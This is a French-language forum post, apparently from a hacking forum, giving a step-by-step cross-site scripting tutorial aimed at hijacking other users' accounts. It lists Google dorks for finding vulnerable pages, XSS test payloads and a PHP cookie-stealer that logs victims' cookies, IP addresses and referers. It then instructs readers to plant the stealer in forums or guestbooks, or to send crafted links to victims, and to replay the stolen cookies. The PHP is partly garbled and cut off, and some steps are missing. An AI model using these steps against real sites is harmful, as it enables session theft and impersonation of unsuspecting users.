Je vous présente aujourd'hui mon tuto xss :

Pour commencer c'est quoi la xss ?

Citation:

"Le cross-site scripting, abrégé XSS, est un type de faille de sécurité des sites Web, que l'on trouve typiquement dans les applications Web qui peuvent être utilisées par un attaquant pour provoquer un comportement du site Web différent de celui désiré par le créateur de la page (redirection vers un site, vol d'informations, etc.). Il est abrégé XSS pour ne pas être confondu avec le CSS (feuilles de style)[1], X étant une abréviation commune pour « cross » (croix) en anglais."

Les dorks xss :
un dork c'est un genre de commande a entrer dans le moteur de recherche de google , dans le but de trouver les liens qu'on veut , voici une petite liste :

Citation:

inurl:com_feedpostold/feedpost.php?url=

inurl:scrapbook.php?id=

inurl:headersearch.php?sid=

inurl:/poll/default.asp?catid=

inurl:/search_results.php?search=

/preaspjobboard//Employee/emp_login.asp?msg1=

pages/match_report.php?mid= pages/match_report.php?mid=

Les type de l'xss :
1-Des failles xss pertinentes (par exemple dans un forum , votre code que vous avez injecté restera a jamais sur le site victime ) .
2-Des failles xss non pertinentes.

OK , j'ai le site , je fait quoi ?

voila ce que tu doit faire :

1-Avant tout , il faut vérifier si le server cible forge des cookies , pour sa , copier et coller ce code dans votre barre de navigation :

Citation:

javascript:alert(document.cookie)

Voila un screen :


Vous voyez ? shadow s'affiche bel et bien en gras et en italique , si la repense du Moteur de recherche était : pas de résultat pour <b><i>shadow</i></b> , c'est qu'il n'ya pas de faille xss.

entrez ce code ensuite :

Citation:

<script>alert("xss by shadow")</script>



3-Faire un scripte voleur de cookies :
comme je l'ai dit , on s'intéresse aux cookies , il faut les "voler" pour voler l'identité de la victime .
Voici un scripte php qui permet de voler les cookies , enregistrer le sous un nom court genre : s.php , n'oublier pas de chmod (777) le dossier afin de permettre au scripte d'écrire sur le server.

<?php
$cookie = $_GET['c'];//c'est pour recup les cookies
$ip = getenv (‘REMOTE_ADDR’);//Pour recup l'ip
$date=date(“j F, Y, g:i a”);
$referer=getenv (‘HTTP_REFERER’);
$fp = fopen(‘cookies.html’, ‘a’);
fwrite($fp, ‘Cookie: ‘.$cookie.’<br> IP: ‘ .$ip. ‘<br> Date and Time: ‘ .$date. ‘<br> Referer: ‘.$referer.’<br><br><br>’);
fclose($fp);
header

Vous devez maintenant uploader le ficher dans votre server qui supporte le PHP .
Note : si vous voulez tester le voleur de cookie sur vous même , vous n'avez qu'a utiliser ce code (dans la barre de recherche du site vuln au xss)


Si vous retourner sur votre server , vous allez vous rendre compte qu'un nouveau fichier est apparu ! cookie.html
Voila ce que vous allez voir :
[code]
Cookie:
IP:
Date and Time:
Referer:

5-Exploiter
Maintenant poster le code du "Voleur de cookie" dans un forum ou un livre d'or vuln au xss , quand les membres impérativement connecté ouvre votre topique , leur cookies seront automatiquement volé .

une autre technique , mettre le scripte en tant que nom de votre topique , et cliquez sur Aperçu , dans un moment l'url change , copiez la RAPIDEMENT , et envoyez le lien a votre victime et récupérez les cookies

6-utiliser les cookies :
Pour utiliser les cookies , vous avez a installer "Add N Edit Cookies" sur Firefox , ou sinon forgez vos cookie avec hkit.